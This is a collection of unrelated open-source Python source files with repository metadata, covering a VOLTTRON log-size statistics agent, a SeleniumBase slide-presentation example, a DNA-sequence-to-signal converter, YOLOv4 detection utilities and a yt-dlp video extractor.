] | 406 | 2015-01-20T03:08:53.000Z | 2022-03-31T20:59:07.000Z | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | cloudcomputingabc/volttron | 6495e26e3185a7af8d0d79ad2586bdf8ea83992d | [
"Apache-2.0",
"BSD-2-Clause"
] | 2,031 | 2015-01-05T21:35:45.000Z | 2022-03-29T21:44:36.000Z | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | cloudcomputingabc/volttron | 6495e26e3185a7af8d0d79ad2586bdf8ea83992d | [
"Apache-2.0",
"BSD-2-Clause"
] | 219 | 2015-01-20T14:53:57.000Z | 2022-03-06T00:37:41.000Z | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2020, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""
    Load the LogStatisticsAgent agent configuration and return an instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
    LogStatisticsAgent reads the volttron.log file size every hour, computes the size delta from the previous hour and
    publishes the difference with a timestamp. It also publishes the standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
        Publishes the file's size increment over the previous time interval (60 minutes) with a timestamp.
        Also publishes the standard deviation of the file's hourly size differences every 24 hours.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers=headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic, message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""
Main method called by the platform.
"""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 39.95858 | 117 | 0.685473 |
ceacce6a356457dd0ca92b5e60fabae47f015271 | 6,318 | py | Python | examples/presenter/my_presentation.py | mdmintz/seleniumspot | f5c225aa4fcd0b4124fc990e3892c36736290ce8 | [
"MIT"
] | 2,745 | 2016-07-20T09:13:15.000Z | 2022-03-29T15:07:31.000Z | examples/presenter/my_presentation.py | mdmintz/seleniumspot | f5c225aa4fcd0b4124fc990e3892c36736290ce8 | [
"MIT"
] | 384 | 2016-07-17T20:45:26.000Z | 2022-03-31T22:35:35.000Z | examples/presenter/my_presentation.py | mdmintz/seleniumspot | f5c225aa4fcd0b4124fc990e3892c36736290ce8 | [
"MIT"
] | 704 | 2016-07-17T20:47:04.000Z | 2022-03-31T04:32:35.000Z | from seleniumbase import BaseCase
class MyPresenterClass(BaseCase):
def test_presenter(self):
self.create_presentation(theme="serif", transition="none")
self.add_slide(
"<h1>Welcome</h1><br />\n" "<h3>Press the <b>Right Arrow</b></h3>"
)
self.add_slide(
"<h3>SeleniumBase Presenter</h3><br />\n"
'<img width="240" src="https://seleniumbase.io/img/logo3a.png" />'
'<span style="margin:144px;" />'
'<img src="https://seleniumbase.io/other/python_3d_logo.png" />'
"<br /><br />\n<h4>Create presentations with <b>Python</b></h4>"
)
self.add_slide(
"<h3>Make slides using <b>HTML</b>:</h3><br />\n"
'<table style="padding:10px;border:4px solid black;font-size:50;">'
'\n<tr style="background-color:CDFFFF;">\n'
"<th>Row ABC</th><th>Row XYZ</th></tr>\n"
'<tr style="background-color:DCFDDC;">'
"<td>Value ONE</td><td>Value TWO</td></tr>\n"
'<tr style="background-color:DFDFFB;">\n'
"<td>Value THREE</td><td>Value FOUR</td></tr>\n"
"</table><br />\n<h4>(HTML <b>table</b> example)</h4>"
)
self.add_slide(
"<h3>Keyboard Shortcuts:</h3>\n"
'<table style="padding:10px;border:4px solid black;font-size:30;'
'background-color:FFFFDD;">\n'
"<tr><th>Key</th><th>Action</th></tr>\n"
"<tr><td><b>=></b></td><td>Next Slide (N also works)</td></tr>\n"
"<tr><td><b><=</b></td><td>Previous Slide (P also works)</td></tr>"
"\n<tr><td>F</td><td>Full Screen Mode</td></tr>\n"
"<tr><td>O</td><td>Overview Mode Toggle</td></tr>\n"
"<tr><td>esc</td><td>Exit Full Screen / Overview Mode</td></tr>\n"
"<tr><td><b>.</b></td><td>Pause/Resume Toggle</td></tr>\n"
"<tr><td>space</td><td>Next Slide (alternative)</td></tr></table>"
)
self.add_slide(
"<h3>Add <b>images</b> to slides:</h3>",
image="https://seleniumbase.io/other/seagulls.jpg",
)
self.add_slide(
"<h3>Add <b>code</b> to slides:</h3>",
code=(
"from seleniumbase import BaseCase\n\n"
"class MyTestClass(BaseCase):\n\n"
" def test_basics(self):\n"
' self.open("https://store.xkcd.com/search")\n'
' self.type(\'input[name="q"]\', "xkcd book\\n")\n'
' self.assert_text("xkcd: volume 0", "h3")\n'
' self.open("https://xkcd.com/353/")\n'
' self.assert_title("xkcd: Python")\n'
" self.assert_element('img[alt=\"Python\"]')\n"
" self.click('a[rel=\"license\"]')\n"
' self.assert_text("free to copy and reuse")\n'
" self.go_back()\n"
' self.click_link("About")\n'
' self.assert_exact_text("xkcd.com", "h2")'
),
)
self.add_slide(
"<h3>Highlight <b>code</b> in slides:</h3>",
code=(
"from seleniumbase import BaseCase\n\n"
"<mark>class MyTestClass(BaseCase):</mark>\n\n"
" def test_basics(self):\n"
' self.open("https://store.xkcd.com/search")\n'
' self.type(\'input[name="q"]\', "xkcd book\\n")\n'
' self.assert_text("xkcd: volume 0", "h3")'
),
)
self.add_slide(
"<h3>Add <b>iFrames</b> to slides:</h3>",
iframe="https://seleniumbase.io/demo_page",
)
self.add_slide(
"<h3>Getting started is <b>easy</b>:</h3>",
code=(
"from seleniumbase import BaseCase\n\n"
"class MyPresenterClass(BaseCase):\n\n"
" def test_presenter(self):\n"
' self.create_presentation(theme="serif")\n'
' self.add_slide("Welcome to Presenter!")\n'
" self.add_slide(\n"
' "Add code to slides:",\n'
" code=(\n"
' "from seleniumbase import BaseCase\\n\\n"\n'
' "class MyPresenterClass(BaseCase):\\n\\n"\n'
' " def test_presenter(self):\\n"\n'
' " self.create_presentation()\\n"))\n'
" self.begin_presentation(\n"
' filename="demo.html", show_notes=True)'
),
)
self.add_slide(
"<h3>Include <b>notes</b> with slides:</h3><br />",
code=(
'self.add_slide("[Your HTML goes here]",\n'
' code="[Your software code goes here]",\n'
' content2="[Additional HTML goes here]",\n'
' notes="[Attached speaker notes go here]"\n'
' "[Note A! -- Note B! -- Note C! ]")'
),
notes="<h2><ul><li>Note A!<li>Note B!<li>Note C!<li>Note D!</h2>",
content2="<h4>(Notes can include HTML tags)</h4>",
)
self.add_slide(
"<h3>Multiple <b>themes</b> available:</h3>",
code=(
'self.create_presentation(theme="serif")\n\n'
'self.create_presentation(theme="sky")\n\n'
'self.create_presentation(theme="simple")\n\n'
'self.create_presentation(theme="white")\n\n'
'self.create_presentation(theme="moon")\n\n'
'self.create_presentation(theme="black")\n\n'
'self.create_presentation(theme="night")\n\n'
'self.create_presentation(theme="beige")\n\n'
'self.create_presentation(theme="league")'
),
)
self.add_slide(
"<h2><b>The End</b></h2>",
image="https://seleniumbase.io/img/sb_logo_10.png",
)
self.begin_presentation(
filename="presenter.html", show_notes=True, interval=0
)
| 48.229008 | 79 | 0.466129 |
35dd40fc28ff605b93136a6aa4fd8514d5d8f5a1 | 9,738 | py | Python | src/utils/gene_to_signal.py | ithihasmadala/gene-to-signal | 96efc1253604c0b5b46a0643e10bd1f0c9a7801c | [
"MIT"
] | null | null | null | src/utils/gene_to_signal.py | ithihasmadala/gene-to-signal | 96efc1253604c0b5b46a0643e10bd1f0c9a7801c | [
"MIT"
] | null | null | null | src/utils/gene_to_signal.py | ithihasmadala/gene-to-signal | 96efc1253604c0b5b46a0643e10bd1f0c9a7801c | [
"MIT"
] | null | null | null |
# *Import packages
from os import error
import math
import csv
import sys
# !Specify the type of representation you want the DNA sequence to be converted into. Choose from: ['Voss', 'Tetrahedron', 'Integer', 'Real', 'Complex']. Default = 'Voss'
# *This is the only variable that needs to be set in this script.
metric = 'Voss'
# !Functions
# *Function to make a list out of the gene sequence. Outputs a list from a string input.
def split(gene):
return [base for base in gene]
# *Function to flatten nested lists into list. Outputs a linear list from a nested list input.
def merge(nuclist):
lis = []
for el in sum(nuclist, []):
lis.append(el)
return lis
# *Function to change sequences to signals. Inputs a seq (string) and type (string) of representation and outputs a list of DNA signal.
def DNAtoSignal(seq, type):
    # *Splitting the seq string into a seq list.
baselist = split(seq)
# *Voss Representation. (signal[0], signal[1], signal[2], signal[3]) ~ (A, G, T, C) respectively.
if (type == "Voss"):
# *Output list called signal.
signal = [[],[],[],[]]
for base in baselist:
if base == 'C' or base == 'c':
signal[3].append(1)
signal[1].append(0)
signal[0].append(0)
signal[2].append(0)
elif base == 'G' or base == 'g':
signal[3].append(0)
signal[1].append(1)
signal[0].append(0)
signal[2].append(0)
elif base == 'A' or base == 'a':
signal[3].append(0)
signal[1].append(0)
signal[0].append(1)
signal[2].append(0)
elif base == 'T' or base == 't':
signal[3].append(0)
signal[1].append(0)
signal[0].append(0)
signal[2].append(1)
elif base == 'U' or base == 'u':
signal[3].append(0)
signal[1].append(0)
signal[0].append(0)
signal[2].append(1)
elif base == 'R' or base == 'r':
signal[3].append(0)
signal[1].append(1)
signal[0].append(1)
signal[2].append(0)
elif base == 'Y' or base == 'y':
signal[3].append(1)
signal[1].append(0)
signal[0].append(0)
signal[2].append(1)
elif base == 'K' or base == 'k':
signal[3].append(0)
signal[1].append(1)
signal[0].append(0)
signal[2].append(1)
elif base == 'M' or base == 'm':
signal[3].append(1)
signal[1].append(0)
signal[0].append(1)
signal[2].append(0)
elif base == 'S' or base == 's':
signal[3].append(1)
signal[1].append(1)
signal[0].append(0)
signal[2].append(0)
elif base == 'W' or base == 'w':
signal[3].append(0)
signal[1].append(0)
signal[0].append(1)
signal[2].append(1)
elif base == 'B' or base == 'b':
signal[3].append(1)
signal[1].append(1)
signal[0].append(0)
signal[2].append(1)
elif base == 'D' or base == 'd':
signal[3].append(0)
signal[1].append(1)
signal[0].append(1)
signal[2].append(1)
elif base == 'H' or base == 'h':
signal[3].append(1)
signal[1].append(0)
signal[0].append(1)
signal[2].append(1)
elif base == 'V' or base == 'v':
signal[3].append(1)
signal[1].append(1)
signal[0].append(1)
signal[2].append(0)
elif base == 'N' or base == 'n':
signal[3].append(1)
signal[1].append(1)
signal[0].append(1)
signal[2].append(1)
elif base == 'X' or base == 'x':
signal[3].append(1)
signal[1].append(1)
signal[0].append(1)
signal[2].append(1)
# *Returning a flattened list.
return merge(signal)
# *Tetrahedron Representation. The formula is taken from the paper <https://dx.doi.org/10.7717%2Fpeerj.4264>
elif type == 'Tetrahedron':
signal = [[],[],[]]
for base in baselist:
if base == 'A' or base == 'a':
signal[0].append(0*math.sqrt(2)/3)
signal[1].append(0*math.sqrt(6)/3)
signal[2].append(3/3)
if base == 'G' or base == 'g':
signal[0].append(-1*math.sqrt(2)/3)
signal[1].append(-1*math.sqrt(6)/3)
signal[2].append(-1/3)
if base == 'T' or base == 't':
signal[0].append(2*math.sqrt(2)/3)
signal[1].append(0*math.sqrt(6)/3)
signal[2].append(-1/3)
if base == 'C' or base == 'c':
signal[0].append(-1*math.sqrt(2)/3)
signal[1].append(1*math.sqrt(6)/3)
signal[2].append(-1/3)
if base == 'U' or base == 'u':
signal[0].append(2*math.sqrt(2)/3)
signal[1].append(0*math.sqrt(6)/3)
signal[2].append(-1/3)
return merge(signal)
# *Integer Representation. (0,1,2,3) ~ (A, T, G, C) respectively.
elif type == 'Integer':
signal = []
for base in baselist:
if base == 'C' or base == 'c':
signal.append(3)
if base == 'G' or base == 'g':
signal.append(2)
if base == 'A' or base == 'a':
signal.append(0)
if base == 'T' or base == 't':
signal.append(1)
if base == 'U' or base == 'u':
signal.append(1)
return signal
# *Real Representation. (-1.5, -0.5, 0.5, 1.5) ~ (A, T, G, C) respectively.
elif type == 'Real':
signal = []
for base in baselist:
if base == 'C' or base == 'c':
signal.append(1.5)
if base == 'G' or base == 'g':
signal.append(0.5)
if base == 'A' or base == 'a':
signal.append(-1.5)
if base == 'T' or base == 't':
signal.append(-0.5)
if base == 'U' or base == 'u':
signal.append(-0.5)
return signal
# *Complex Representation. ((1,1), (1,-1), (-1,1), (-1,-1)) ~ (A, T, G, C) respectively.
elif type == 'Complex':
signal = [[],[]]
for base in baselist:
if base == 'C' or base == 'c':
signal[0].append(-1)
signal[1].append(-1)
if base == 'G' or base == 'g':
signal[0].append(-1)
signal[1].append(1)
if base == 'A' or base == 'a':
signal[0].append(1)
signal[1].append(1)
if base == 'T' or base == 't':
signal[0].append(1)
signal[1].append(-1)
if base == 'U' or base == 'u':
signal[0].append(1)
signal[1].append(-1)
return merge(signal)
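# *Illustrative helper (an addition for clarity, not part of the original script):
# shows the Voss encoding of a short sequence. Channel order is (A, G, T, C), so
# 'ACGT' flattens to [1,0,0,0, 0,0,1,0, 0,0,0,1, 0,1,0,0].
def _voss_example():
    return DNAtoSignal('ACGT', 'Voss')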
# *List to make DNASignal.csv
DNASignal = []
# *Check to see error in choosing representation.
if metric in ['Voss', 'Tetrahedron', 'Integer', 'Real', 'Complex']:
# *Opening dataset.csv with gene sequences.
with open('../../data/interim/dataset.csv', mode='r') as csv_file:
rows = csv.DictReader(csv_file)
# *To check if running properly.
current_class = 'Birds'
print("\nConverting DNA sequences to "+metric+" representation.")
print("---------------------------------------------------------------------------------------------------------------")
print("Converting class of "+current_class+".")
# *Looping through the various gene sequences in dataset.csv.
for row in rows:
if current_class != row['Class']:
current_class = row['Class']
print("Converting class of "+current_class+".")
# *Calling the DNAtoSignal function to generate DNA signal.
signal = DNAtoSignal(row['Gene Sequence'], metric)
# *Making new csv row with 'Signal' key.
data_row = {'Class': row['Class'], 'ID': row['ID'], 'Gene Sequence': row['Gene Sequence'], 'Signal': signal}
DNASignal.append(data_row)
# *Creating the csv at ../../data/processed/DNASignal.csv.
with open('../../data/processed/DNASignal.csv', 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=DNASignal[0].keys())
writer.writeheader()
writer.writerows(DNASignal)
# *Statement signfying end of script.
print("---------------------------------------------------------------------------------------------------------------")
print("Sequences converted and stored at gene-to-signal/data/processed/DNASignal.csv.\n")
# *In case of wrong representation variable.
else:
print("\n---------------------------------------------------------------------------------------------------------------")
print("\nError: Type of representation is not supported. Please check the variable 'metric'.\n")
print("---------------------------------------------------------------------------------------------------------------")
sys.exit() | 39.425101 | 170 | 0.454919 |
4362266424de6b76013b18124be2bcc5cd063452 | 76 | py | Python | engine/model/__init__.py | rahulmadanraju/Semantic-Search-Engine | b0be4b9cdee2362be6c7ac97865c2588a7acdc15 | [
"MIT"
] | 2 | 2020-06-03T11:26:56.000Z | 2020-07-23T11:23:32.000Z | engine/model/__init__.py | rahulmadanraju/Semantic-Search-Engine | b0be4b9cdee2362be6c7ac97865c2588a7acdc15 | [
"MIT"
] | null | null | null | engine/model/__init__.py | rahulmadanraju/Semantic-Search-Engine | b0be4b9cdee2362be6c7ac97865c2588a7acdc15 | [
"MIT"
] | null | null | null | from engine.model.transformers import sentence_embeddings, predict_results
| 25.333333 | 74 | 0.881579 |
64ee140fd3a5dfa235fd7544d5ea51dcf2badd45 | 7,881 | py | Python | tool/utils.py | kndt84/pytorch-YOLOv4 | dfaada3517c5e3bea07f96e0e1e62a003271fa24 | [
"Apache-2.0"
] | null | null | null | tool/utils.py | kndt84/pytorch-YOLOv4 | dfaada3517c5e3bea07f96e0e1e62a003271fa24 | [
"Apache-2.0"
] | null | null | null | tool/utils.py | kndt84/pytorch-YOLOv4 | dfaada3517c5e3bea07f96e0e1e62a003271fa24 | [
"Apache-2.0"
] | null | null | null | import sys
import os
import time
import math
import numpy as np
import cv2
import itertools
import struct # get_image_size
import imghdr # get_image_size
from torch import nn
from torchvision import datasets, models, transforms
from torch.autograd import Variable
from PIL import Image
def extract_feature(img):
model = models.googlenet(pretrained=True)
layers = list(model.children())[:-2]
model = nn.Sequential(*layers, nn.Flatten())
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
preprocess = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize
])
new_img = np.copy(img)
new_img = cv2.cvtColor(new_img, cv2.COLOR_BGR2RGB)
new_img = Image.fromarray(new_img)
img_tensor = preprocess(new_img)
img_tensor.unsqueeze_(0)
out = model(Variable(img_tensor))
return out.to('cpu').detach().numpy().ravel()
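# Illustrative usage (an assumption added for clarity, not part of the original file):
# `img` is a BGR image as returned by cv2.imread(); the result is a flat feature
# vector (1024 values for GoogLeNet's pooled features).
def _extract_feature_example(path="example.jpg"):
    img = cv2.imread(path)
    return extract_feature(img)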
def crop_box(img, box):
img = np.copy(img)
width = img.shape[1]
height = img.shape[0]
x0 = int(box[0] * width)
y0 = int(box[1] * height)
x1 = int(box[2] * width)
y1 = int(box[3] * height)
return img[y0:y1, x0:x1]
def get_bbox_coordinates(img, box):
img = np.copy(img)
width = img.shape[1]
height = img.shape[0]
x0 = int(box[0] * width)
y0 = int(box[1] * height)
x1 = int(box[2] * width)
y1 = int(box[3] * height)
return {'x0':x0, 'y0': y0, 'x1': x1, 'y1': y1}
def sigmoid(x):
return 1.0 / (np.exp(-x) + 1.)
def softmax(x):
x = np.exp(x - np.expand_dims(np.max(x, axis=1), axis=1))
x = x / np.expand_dims(x.sum(axis=1), axis=1)
return x
def bbox_iou(box1, box2, x1y1x2y2=True):
# print('iou box1:', box1)
# print('iou box2:', box2)
if x1y1x2y2:
mx = min(box1[0], box2[0])
Mx = max(box1[2], box2[2])
my = min(box1[1], box2[1])
My = max(box1[3], box2[3])
w1 = box1[2] - box1[0]
h1 = box1[3] - box1[1]
w2 = box2[2] - box2[0]
h2 = box2[3] - box2[1]
else:
w1 = box1[2]
h1 = box1[3]
w2 = box2[2]
h2 = box2[3]
mx = min(box1[0], box2[0])
Mx = max(box1[0] + w1, box2[0] + w2)
my = min(box1[1], box2[1])
My = max(box1[1] + h1, box2[1] + h2)
uw = Mx - mx
uh = My - my
cw = w1 + w2 - uw
ch = h1 + h2 - uh
carea = 0
if cw <= 0 or ch <= 0:
return 0.0
area1 = w1 * h1
area2 = w2 * h2
carea = cw * ch
uarea = area1 + area2 - carea
return carea / uarea
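# Small worked example (added for clarity, not part of the original file): two 2x2
# boxes offset by (1, 1) overlap in a 1x1 region, so IoU = 1 / (4 + 4 - 1) ~= 0.143.
def _bbox_iou_example():
    return bbox_iou([0, 0, 2, 2], [1, 1, 3, 3], x1y1x2y2=True)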
def nms_cpu(boxes, confs, nms_thresh=0.5, min_mode=False):
# print(boxes.shape)
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
areas = (x2 - x1) * (y2 - y1)
order = confs.argsort()[::-1]
keep = []
while order.size > 0:
idx_self = order[0]
idx_other = order[1:]
keep.append(idx_self)
xx1 = np.maximum(x1[idx_self], x1[idx_other])
yy1 = np.maximum(y1[idx_self], y1[idx_other])
xx2 = np.minimum(x2[idx_self], x2[idx_other])
yy2 = np.minimum(y2[idx_self], y2[idx_other])
w = np.maximum(0.0, xx2 - xx1)
h = np.maximum(0.0, yy2 - yy1)
inter = w * h
if min_mode:
over = inter / np.minimum(areas[order[0]], areas[order[1:]])
else:
over = inter / (areas[order[0]] + areas[order[1:]] - inter)
inds = np.where(over <= nms_thresh)[0]
order = order[inds + 1]
return np.array(keep)
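# Minimal usage sketch (an assumption, not part of the original file): the two heavily
# overlapping boxes collapse to the higher-confidence one (index 0), while the
# disjoint box (index 2) survives.
def _nms_cpu_example():
    boxes = np.array([[0.00, 0.00, 1.00, 1.00],
                      [0.05, 0.05, 1.00, 1.00],
                      [2.00, 2.00, 3.00, 3.00]])
    confs = np.array([0.9, 0.8, 0.7])
    return nms_cpu(boxes, confs, nms_thresh=0.5)  # -> array([0, 2])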
def plot_boxes_cv2(img, boxes, savename=None, class_names=None, color=None):
img = np.copy(img)
colors = np.array([[1, 0, 1], [0, 0, 1], [0, 1, 1], [0, 1, 0], [1, 1, 0], [1, 0, 0]], dtype=np.float32)
def get_color(c, x, max_val):
ratio = float(x) / max_val * 5
i = int(math.floor(ratio))
j = int(math.ceil(ratio))
ratio = ratio - i
r = (1 - ratio) * colors[i][c] + ratio * colors[j][c]
return int(r * 255)
width = img.shape[1]
height = img.shape[0]
for i in range(len(boxes)):
box = boxes[i]
x1 = int(box[0] * width)
y1 = int(box[1] * height)
x2 = int(box[2] * width)
y2 = int(box[3] * height)
if color:
rgb = color
else:
rgb = (255, 0, 0)
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%s: %f' % (class_names[cls_id], cls_conf))
classes = len(class_names)
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes)
green = get_color(1, offset, classes)
blue = get_color(0, offset, classes)
if color is None:
rgb = (red, green, blue)
img = cv2.putText(img, class_names[cls_id], (x1, y1), cv2.FONT_HERSHEY_SIMPLEX, 1.2, rgb, 1)
img = cv2.rectangle(img, (x1, y1), (x2, y2), rgb, 1)
if savename:
print("save plot results to %s" % savename)
cv2.imwrite(savename, img)
return img
def read_truths(lab_path):
if not os.path.exists(lab_path):
return np.array([])
if os.path.getsize(lab_path):
truths = np.loadtxt(lab_path)
        truths = truths.reshape(truths.size // 5, 5)  # to avoid single truth problem
return truths
else:
return np.array([])
def load_class_names(namesfile):
class_names = []
with open(namesfile, 'r') as fp:
lines = fp.readlines()
for line in lines:
line = line.rstrip()
class_names.append(line)
return class_names
def post_processing(img, conf_thresh, nms_thresh, output):
# anchors = [12, 16, 19, 36, 40, 28, 36, 75, 76, 55, 72, 146, 142, 110, 192, 243, 459, 401]
# num_anchors = 9
# anchor_masks = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
# strides = [8, 16, 32]
# anchor_step = len(anchors) // num_anchors
# [batch, num, 1, 4]
box_array = output[0]
# [batch, num, num_classes]
confs = output[1]
t1 = time.time()
if type(box_array).__name__ != 'ndarray':
box_array = box_array.cpu().detach().numpy()
confs = confs.cpu().detach().numpy()
num_classes = confs.shape[2]
# [batch, num, 4]
box_array = box_array[:, :, 0]
# [batch, num, num_classes] --> [batch, num]
max_conf = np.max(confs, axis=2)
max_id = np.argmax(confs, axis=2)
t2 = time.time()
bboxes_batch = []
for i in range(box_array.shape[0]):
argwhere = max_conf[i] > conf_thresh
l_box_array = box_array[i, argwhere, :]
l_max_conf = max_conf[i, argwhere]
l_max_id = max_id[i, argwhere]
bboxes = []
# nms for each class
for j in range(num_classes):
cls_argwhere = l_max_id == j
ll_box_array = l_box_array[cls_argwhere, :]
ll_max_conf = l_max_conf[cls_argwhere]
ll_max_id = l_max_id[cls_argwhere]
keep = nms_cpu(ll_box_array, ll_max_conf, nms_thresh)
if (keep.size > 0):
ll_box_array = ll_box_array[keep, :]
ll_max_conf = ll_max_conf[keep]
ll_max_id = ll_max_id[keep]
for k in range(ll_box_array.shape[0]):
bboxes.append([ll_box_array[k, 0], ll_box_array[k, 1], ll_box_array[k, 2], ll_box_array[k, 3], ll_max_conf[k], ll_max_conf[k], ll_max_id[k]])
bboxes_batch.append(bboxes)
t3 = time.time()
print('-----------------------------------')
print(' max and argmax : %f' % (t2 - t1))
print(' nms : %f' % (t3 - t2))
print('Post processing total : %f' % (t3 - t1))
print('-----------------------------------')
return bboxes_batch
| 27.652632 | 161 | 0.541809 |
c79d27a0de5cac6efb738d035efb4090ca390091 | 2,005 | py | Python | yt_dlp/extractor/syfy.py | olipfei/yt-dlp | 7879e79d11a2e5855167820518df49caf623fe48 | [
"Unlicense"
] | 11 | 2022-01-06T22:09:50.000Z | 2022-03-12T22:26:22.000Z | yt_dlp/extractor/syfy.py | olipfei/yt-dlp | 7879e79d11a2e5855167820518df49caf623fe48 | [
"Unlicense"
] | 4 | 2022-02-25T08:20:18.000Z | 2022-03-17T16:16:20.000Z | yt_dlp/extractor/syfy.py | olipfei/yt-dlp | 7879e79d11a2e5855167820518df49caf623fe48 | [
"Unlicense"
] | 3 | 2022-02-19T08:59:13.000Z | 2022-03-06T16:11:21.000Z | from .adobepass import AdobePassIE
from ..utils import (
update_url_query,
smuggle_url,
)
class SyfyIE(AdobePassIE):
_VALID_URL = r'https?://(?:www\.)?syfy\.com/(?:[^/]+/)?videos/(?P<id>[^/?#]+)'
_TESTS = [{
'url': 'http://www.syfy.com/theinternetruinedmylife/videos/the-internet-ruined-my-life-season-1-trailer',
'info_dict': {
'id': '2968097',
'ext': 'mp4',
'title': 'The Internet Ruined My Life: Season 1 Trailer',
'description': 'One tweet, one post, one click, can destroy everything.',
'uploader': 'NBCU-MPAT',
'upload_date': '20170113',
'timestamp': 1484345640,
},
'params': {
# m3u8 download
'skip_download': True,
},
'add_ie': ['ThePlatform'],
}]
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
syfy_mpx = list(self._parse_json(self._search_regex(
r'jQuery\.extend\(Drupal\.settings\s*,\s*({.+?})\);', webpage, 'drupal settings'),
display_id)['syfy']['syfy_mpx'].values())[0]
video_id = syfy_mpx['mpxGUID']
title = syfy_mpx['episodeTitle']
query = {
'mbr': 'true',
'manifest': 'm3u',
}
if syfy_mpx.get('entitlement') == 'auth':
resource = self._get_mvpd_resource(
'syfy', title, video_id,
syfy_mpx.get('mpxRating', 'TV-14'))
query['auth'] = self._extract_mvpd_auth(
url, video_id, 'syfy', resource)
return {
'_type': 'url_transparent',
'ie_key': 'ThePlatform',
'url': smuggle_url(update_url_query(
self._proto_relative_url(syfy_mpx['releaseURL']), query),
{'force_smil_url': True}),
'title': title,
'id': video_id,
'display_id': display_id,
}
| 35.175439 | 113 | 0.527681 |
d2733611e34b0b364c29ff473b041a44ce553f2b | 26 | py | Python | utils/all.py | QiangZiBro/compass | 30c3d89a69e496185488dd5f596de517f59624fc | [
"Apache-2.0"
] | null | null | null | utils/all.py | QiangZiBro/compass | 30c3d89a69e496185488dd5f596de517f59624fc | [
"Apache-2.0"
] | 1 | 2021-09-23T06:59:23.000Z | 2021-09-23T06:59:23.000Z | utils/all.py | QiangZiBro/compass | 30c3d89a69e496185488dd5f596de517f59624fc | [
